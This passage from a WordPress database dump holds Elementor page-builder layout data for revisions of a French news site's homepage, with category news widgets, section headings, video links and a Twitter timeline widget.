kvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2286,743,'_elementor_version','0.4'),(2287,743,'_elementor_css','a:3:{s:4:\"time\";i:1509369189;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2289,744,'_elementor_edit_mode','builder'),(2290,744,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2291,744,'_elementor_version','0.4'),(2292,744,'_elementor_css','a:3:{s:4:\"time\";i:1509369218;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2294,745,'_elementor_edit_mode','builder'),(2295,745,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\